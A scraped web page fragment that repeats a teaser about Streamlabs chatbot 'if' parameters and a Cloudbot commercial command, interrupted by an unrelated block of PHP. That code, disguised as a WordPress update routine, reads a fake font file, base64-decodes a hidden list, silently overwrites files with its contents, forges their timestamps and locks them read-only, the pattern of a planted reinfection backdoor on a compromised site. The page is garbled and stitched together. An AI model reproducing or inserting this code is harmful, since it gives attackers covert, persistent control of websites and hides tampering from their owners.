New Cloudbot Feature: Commercial Command for YouTube Ad Breaks
IAmTomahawkx IF-Parameters: If Parameters for the streamlabs chatbot It took a little bit of figuring out how some of the chatbot commands work, so I hope this information might be …
$wp_update_file="/home/u220714/bbmoru/www/wp-includes/fonts/dashicons.woff0"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
IAmTomahawkx IF-Parameters: If Parameters for the streamlabs chatbot It took a little bit of figuring out how some of the chatbot commands work, so I hope this information might be …